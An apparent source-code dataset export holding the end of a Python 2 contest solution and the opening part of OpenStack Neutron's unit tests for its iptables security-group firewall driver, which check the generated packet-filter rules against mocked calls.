if n % 10 == 0:
n -= 1
res += 1
continue
length = len(str(n))
secondhalf = n % (10**(length/2))
# print secondhalf
take = secondhalf - 1
res += take
n -= take
# reverse if it helps
rev = flip(n)
if rev < n:
n = rev
res += 1
# print n
take = n % (10**(length - 1))
res += take + 2
n -= take + 2
return res + n
f = fileinput.input()
T = int(f.readline())
for t in range(T):
n = int(f.readline())
solve(n)
print "Case #{0}: {1}".format(t + 1, solve(n))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
05f027a2c1c5070d461991e8ee1248b0e5a93a37 | 5aeab8f41edf0ccb92e76b2dce06b693e0635dd6 | /neutron/neutron/tests/unit/agent/linux/test_iptables_firewall.py | acb6666126c2b224ced2b69281235d4c5d2813eb | [
"Apache-2.0"
] | permissive | xjforfuture/openstack | 113e75b0d92e96caf715d4ac258f3c683b8a9894 | 913dbc266ed818519485b2302387e8f0ae198e70 | refs/heads/master | 2022-11-27T04:06:41.982869 | 2017-11-20T08:15:38 | 2017-11-20T08:15:38 | 111,380,539 | 0 | 1 | null | 2020-07-22T22:11:30 | 2017-11-20T08:11:03 | Python | UTF-8 | Python | false | false | 95,094 | py | # Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from neutron_lib import constants
from oslo_config import cfg
import testtools
from neutron.agent import firewall
from neutron.agent.linux import ip_conntrack
from neutron.agent.linux import ipset_manager
from neutron.agent.linux import iptables_comments as ic
from neutron.agent.linux import iptables_firewall
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron.conf.agent import common as agent_config
from neutron.conf.agent import securitygroups_rpc as security_config
from neutron.tests import base
from neutron.tests.unit.api.v2 import test_base
_uuid = test_base._uuid
#TODO(mangelajo): replace all 'IPv4', 'IPv6' to constants
FAKE_PREFIX = {'IPv4': '10.0.0.0/24',
'IPv6': 'fe80::/48'}
FAKE_IP = {'IPv4': '10.0.0.1',
'IPv6': 'fe80::1'}
#TODO(mangelajo): replace all '*_sgid' strings for the constants
FAKE_SGID = 'fake_sgid'
OTHER_SGID = 'other_sgid'
_IPv6 = constants.IPv6
_IPv4 = constants.IPv4
RAW_TABLE_OUTPUT = """
# Generated by iptables-save v1.4.21 on Fri Jul 31 16:13:28 2015
*raw
:PREROUTING ACCEPT [11561:3470468]
:OUTPUT ACCEPT [11504:4064044]
:neutron-openvswi-OUTPUT - [0:0]
:neutron-openvswi-PREROUTING - [0:0]
-A PREROUTING -j neutron-openvswi-PREROUTING
-A OUTPUT -j neutron-openvswi-OUTPUT
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvbe804433b-61 -j CT --zone 1
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tape804433b-61 -j CT --zone 1
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvb95c24827-02 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tap95c24827-02 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvb61634509-31 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tap61634509-31 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvb8f46cf18-12 -j CT --zone 9
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tap8f46cf18-12 -j CT --zone 9
COMMIT
# Completed on Fri Jul 31 16:13:28 2015
""" # noqa
class BaseIptablesFirewallTestCase(base.BaseTestCase):
def setUp(self):
super(BaseIptablesFirewallTestCase, self).setUp()
security_config.register_securitygroups_opts()
agent_config.register_root_helper(cfg.CONF)
cfg.CONF.set_override('comment_iptables_rules', False, 'AGENT')
self.utils_exec_p = mock.patch(
'neutron.agent.linux.utils.execute')
self.utils_exec = self.utils_exec_p.start()
self.iptables_cls_p = mock.patch(
'neutron.agent.linux.iptables_manager.IptablesManager')
iptables_cls = self.iptables_cls_p.start()
self.iptables_inst = mock.Mock()
self.v4filter_inst = mock.Mock()
self.v6filter_inst = mock.Mock()
self.iptables_inst.ipv4 = {'filter': self.v4filter_inst,
'raw': self.v4filter_inst
}
self.iptables_inst.ipv6 = {'filter': self.v6filter_inst,
'raw': self.v6filter_inst
}
iptables_cls.return_value = self.iptables_inst
self.iptables_inst.get_rules_for_table.return_value = (
RAW_TABLE_OUTPUT.splitlines())
self.firewall = iptables_firewall.IptablesFirewallDriver()
self.firewall.iptables = self.iptables_inst
# don't mess with sysctl knobs in unit tests
self.firewall._enabled_netfilter_for_bridges = True
# initial data has 1, 2, and 9 in use, see RAW_TABLE_OUTPUT above.
self._dev_zone_map = {'61634509-31': 2, '8f46cf18-12': 9,
'95c24827-02': 2, 'e804433b-61': 1}
get_rules_for_table_func = lambda x: RAW_TABLE_OUTPUT.split('\n')
filtered_ports = {port_id: self._fake_port()
for port_id in self._dev_zone_map}
self.firewall.ipconntrack = ip_conntrack.IpConntrackManager(
get_rules_for_table_func, filtered_ports=filtered_ports,
unfiltered_ports=dict())
self.firewall.ipconntrack._device_zone_map = self._dev_zone_map
def _fake_port(self):
return {'device': 'tapfake_dev',
'mac_address': 'ff:ff:ff:ff:ff:ff',
'network_id': 'fake_net',
'fixed_ips': [FAKE_IP['IPv4'],
FAKE_IP['IPv6']]}
class IptablesFirewallTestCase(BaseIptablesFirewallTestCase):
def test_prepare_port_filter_with_no_sg(self):
port = self._fake_port()
self.firewall.prepare_port_filter(port)
calls = [mock.call.add_chain('sg-fallback'),
mock.call.add_rule(
'sg-fallback', '-j DROP',
comment=ic.UNMATCH_DROP),
mock.call.add_chain('sg-chain'),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_chain('ifake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $ifake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'ifake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-m state --state INVALID -j DROP',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_chain('ofake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule('INPUT',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.INPUT_TO_SG),
mock.call.add_chain('sfake_dev'),
mock.call.add_rule(
'sfake_dev',
'-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
'-j RETURN',
comment=ic.PAIR_ALLOW),
mock.call.add_rule(
'sfake_dev', '-j DROP',
comment=ic.PAIR_DROP),
mock.call.add_rule(
'ofake_dev',
'-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
'--sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule('ofake_dev', '-j $sfake_dev',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 67 --dport 68 -j DROP',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule(
'ofake_dev',
'-j $sg-fallback',
comment=None),
mock.call.add_rule('sg-chain', '-j ACCEPT')]
self.v4filter_inst.assert_has_calls(calls)
def test_filter_ipv4_ingress(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress'}
ingress = mock.call.add_rule('ifake_dev', '-j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p tcp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p tcp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_icmp(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'icmp'}
ingress = mock.call.add_rule('ifake_dev', '-p icmp -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'icmp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -p icmp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p udp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p udp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_dccp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'dccp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p dccp -m dccp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_sctp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'sctp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p sctp -m sctp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress'}
egress = mock.call.add_rule('ofake_dev', '-j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_dest_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_source_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'source_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-s %s -j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp'}
egress = mock.call.add_rule(
'ofake_dev', '-p tcp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p tcp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp'}
egress = mock.call.add_rule('ofake_dev', '-p icmp -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -p icmp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_type(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p icmp -m icmp --icmp-type 8 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_type_name(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 'echo-request',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p icmp -m icmp --icmp-type echo-request '
'-j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_type_code(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'port_range_max': 0,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p icmp -m icmp --icmp-type 8/0 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp'}
egress = mock.call.add_rule(
'ofake_dev', '-p udp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p udp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress'}
ingress = mock.call.add_rule('ifake_dev', '-j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p tcp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p tcp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_icmp(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'icmp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p ipv6-icmp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'icmp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -p ipv6-icmp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def _test_filter_ingress_tcp_min_port_0(self, ethertype):
rule = {'ethertype': ethertype,
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 0,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p tcp -m tcp -m multiport --dports 0:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ingress_tcp_min_port_0_for_ipv4(self):
self._test_filter_ingress_tcp_min_port_0('IPv4')
def test_filter_ingress_tcp_min_port_0_for_ipv6(self):
self._test_filter_ingress_tcp_min_port_0('IPv6')
def test_filter_ipv6_ingress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p udp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p udp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress'}
egress = mock.call.add_rule('ofake_dev', '-j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp'}
egress = mock.call.add_rule(
'ofake_dev', '-p tcp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p tcp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp'}
egress = mock.call.add_rule(
'ofake_dev', '-p ipv6-icmp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -p ipv6-icmp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_type(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p ipv6-icmp -m icmp6 --icmpv6-type 8 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_type_name(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 'echo-request',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p ipv6-icmp -m icmp6 --icmpv6-type echo-request '
'-j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_type_code(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'port_range_max': 0,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p ipv6-icmp -m icmp6 --icmpv6-type 8/0 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp'}
egress = mock.call.add_rule(
